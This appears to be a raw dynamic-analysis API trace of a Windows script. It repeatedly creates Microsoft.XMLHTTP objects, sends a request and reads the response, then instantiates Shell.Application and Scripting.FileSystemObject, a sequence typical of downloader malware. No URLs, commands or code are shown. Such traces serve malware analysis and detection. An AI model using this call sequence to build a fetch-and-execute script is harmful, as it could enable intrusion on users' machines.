	[0284.910] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0284.910] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0284.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0284.910] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0284.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.910] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0284.910] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0284.911] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0284.911] SysStringLen (param_1=0x0) returned 0x0
	[0284.911] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0284.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0284.911] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0284.911] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0284.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0284.911] ??2@YAPEAX_K@Z () returned 0x62f310
	[0284.911] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0284.911] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0284.911] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0284.911] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0284.912] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0284.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.912] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0284.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0284.912] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0284.912] SysStringLen (param_1=0x0) returned 0x0
	[0284.912] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0284.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0284.912] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0284.912] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0284.912] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0284.913] ??2@YAPEAX_K@Z () returned 0x62f330
	[0284.913] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0284.913] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0284.913] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0284.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0284.913] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0284.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.913] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0284.913] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0284.913] longjmp () 
	[0284.913] longjmp () 
	[0284.914] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0284.914] SysStringLen (param_1=0x0) returned 0x0
	[0284.914] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0284.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0284.914] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0284.914] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0284.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0284.914] ??2@YAPEAX_K@Z () returned 0x62f310
	[0284.914] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0284.914] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0284.914] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0284.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0284.914] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0284.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.914] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0284.914] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0284.915] longjmp () 
	[0284.915] longjmp () 
	[0284.915] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0284.917] SysStringLen (param_1=0x0) returned 0x0
	[0284.918] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0284.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0284.918] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0284.918] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0284.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0284.918] ??2@YAPEAX_K@Z () returned 0x62f330
	[0284.918] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0284.918] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0284.918] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0284.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0284.918] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0284.918] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.918] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0284.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0284.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0284.919] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0284.919] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0286.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0286.891] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0286.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0286.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0286.891] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0286.891] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0286.892] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0286.892] SysStringLen (param_1=0x0) returned 0x0
	[0286.892] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0286.892] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0286.892] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0286.892] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0286.892] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0286.892] ??2@YAPEAX_K@Z () returned 0x62f350
	[0286.892] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0286.892] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0286.892] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0286.892] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0286.892] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0286.892] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0286.893] SysStringLen (param_1=0x0) returned 0x0
	[0286.893] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0286.896] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0286.896] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0286.896] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
